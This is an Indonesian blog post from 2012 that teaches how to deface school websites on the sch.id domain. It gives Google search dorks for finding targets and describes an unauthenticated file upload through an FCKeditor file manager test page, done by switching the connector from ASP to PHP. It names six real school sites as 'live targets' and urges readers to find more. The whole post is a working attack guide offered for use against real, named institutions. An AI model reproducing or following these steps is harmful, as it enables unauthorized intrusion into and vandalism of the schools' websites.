Headlines News :
Home » » cara deface website/situs sekolah (sch.id)

cara deface website/situs sekolah (sch.id)

Written By Ariez Marinecyber on Minggu, 05 Agustus 2012 | 8/05/2012 12:33:00 AM

di sini kita akan menyelipkan file txt di situs sekolah, ingat ya.. gk file index.php..

soalnya kalo index ane gk bisa =)

bahan yang di perlukan :


1. Siapkan file txt.



2. Dork:
  • inurl:/html/siswa.php? 
  • inurl:/html/alumni.php?
  • inurl:/html/guru.php?
3. Exploit: /editor/filemanager/connectors/test.html (lalu, copas ini)


EX:
  • http://xxx.sch.id/html/siswa.php
  • http://xxx.sch.id/html/almni.php
  • http://xxx.sch.id/html/guru.php
*Sesuai Dork.

Ganti jadi: http://xxxx.sch.id/editor/filemanager/connectors/test.html

4. Ganti ASP jadi PHP.

5. Browse file txt yang sudah disiapkan -> open -> upload.

6. Hasilnya: http://xxx.sch.id/userfiles/file/nama-file.txt

live target : 
http://sdia20.sch.id/simk/atk/attributes/fck/editor/filemanager/connectors/test.html
http://www.e-learning.smpbatikska.sch.id/editor/filemanager/connectors/test.html
http://sman1kotabaru.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html
http://www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html


udah ah.. capek...

cari aja pake dork tadi..
:D

Share this article :

Pengikut

my Twitter

 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. World zone - DUNIA XXX - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger